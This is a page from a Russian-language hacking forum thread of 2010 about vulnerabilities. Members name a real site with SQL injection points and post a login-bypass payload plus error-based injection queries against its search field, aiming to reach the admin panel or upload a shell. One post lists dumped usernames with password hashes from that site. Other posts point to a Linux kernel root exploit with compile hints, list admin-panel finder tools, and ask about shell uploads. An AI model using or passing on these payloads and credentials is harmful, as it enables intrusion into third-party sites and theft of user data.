HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1364 из 2422 « Первая < 364864126413141354 1360 1361 1362 1363 1364 1365 1366 1367 1368 13741414146418642364 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.06.2010, 19:51
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию
Цитата:
Сообщение от -=ASSKAKO=-  
имеется иньекция при авторизации
Код:
http://cic.kz/admin/login
иньекция в поле поиска:
Код:
http://cic.kz/search/
пхпинфо:
Код:
http://cic.kz/phpinfo.php
практически все каталоги\папки доступны к индексированию:
Код:
http://cic.kz/classes/
http://cic.kz/wysiwyg/
раскрытие пути:
Код:
http://cic.kz/userfiles/LAW/kz/
http://cic.kz/wysiwyg/plugins/images/connector/yoursessioncheck.php
также имеется руки растущие оттуда, откуда сижу...
цель: получить доступ в админку либо залить шелл.
Проще некуда. В поле логин:

Код:
' or 1= 1 --
Без плюсов, только чистые пробелы.

Здравствуйте, Глеб. =)
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 19.06.2010, 21:47
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами: 8954306

Репутация: 1588
По умолчанию
а поле серч хекается при запросе

Код:
xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
добавление :

Ну короче поахал себе мозг, вот что вышло

table : users (id,login.password)

gleb:609562b36985b13c69167ed9b3525c0a

VS:016d36db759cbd97f97b8f44d1586020

и т.д.

С хешами я хз, все вместились или нет

запрос

Код:
xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)e)b)a)/**/and/**/'1'='1
вообще вот )
 
Ответить с цитированием

  #3  
Старый 20.06.2010, 13:38
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию
Скажите есть какой-то софт для поиска админки на сайте?

Скуль хелпер не работает.
 
Ответить с цитированием

  #4  
Старый 20.06.2010, 13:39
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
Цитата:
Сообщение от CyberHunter  
Скажите есть какой-то софт для поиска админки на сайте?
Скуль хелпер не работает.
ArxScanSite,AdminFinder,IntelliTamper,DirBuster
 
Ответить с цитированием

  #5  
Старый 20.06.2010, 16:30
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию
Помогите вывести версию БД.

http://www.syntex.sk/novinky.php?od=75+and+substring(version(),1,1)=5

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/html/syntex.sk/public_html/novinky.php on line 34
 
Ответить с цитированием

  #6  
Старый 20.06.2010, 16:41
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию
По моему там чтото типа такого:

SELECT * FROM mytable where od='.mysql_real_escape_string($_GET['od']).';

Поэтому когда ты ставишь ковычку или чтото ещё то запрос возвращает просто пустой результат)

там нет проверки mysql_num_rows, поэтому это не скуля
 
Ответить с цитированием

  #7  
Старый 20.06.2010, 18:54
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию
Помогите воспользоваться руткитом.

Собираюсь получить права рут на Linux Kernel 2.6.5

Вроде бы нашел сплойт http://milw0rm.com/exploits/8556

А как воспользоваться чётко незнаю.
 
Ответить с цитированием

  #8  
Старый 20.06.2010, 19:47
iv.
Познавший АНТИЧАТ
Регистрация: 21.03.2007
Сообщений: 1,200
С нами: 10074686

Репутация: 1204


По умолчанию
Цитата:
Сообщение от None  
Помогите воспользоваться руткитом.
Собираюсь получить права рут на Linux Kernel 2.6.5
Вроде бы нашел сплойт http://milw0rm.com/exploits/8556
А как воспользоваться чётко незнаю.
Ну, во-первых, это не руткит.

А как использовать можно найти в блоге автора - http://kernelbof.blogspot.com/2009/04/kernel-memory-corruptions-are-not-just.html В частности для компиляции нужны хедеры libsctp (пакет libsctp-dev для дебиана, например).
 
Ответить с цитированием

  #9  
Старый 20.06.2010, 23:58
life_glider
Познающий
Регистрация: 13.04.2010
Сообщений: 42
С нами: 8463290

Репутация: 81
По умолчанию
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO counter (ip,cookie,date) values('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]session_id[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"',NOW())"[/COLOR][COLOR="#007700"];[/COLOR][/COLOR
уязвим ли данный код?(mq-off)
 
Ответить с цитированием

  #10  
Старый 21.06.2010, 01:29
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
ребят у кого есть опыт заливки шелла в tigeradmin ?
 
Ответить с цитированием
Ответ
Страница 1364 из 2422 « Первая < 364864126413141354 1360 1361 1362 1363 1364 1365 1366 1367 1368 13741414146418642364 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.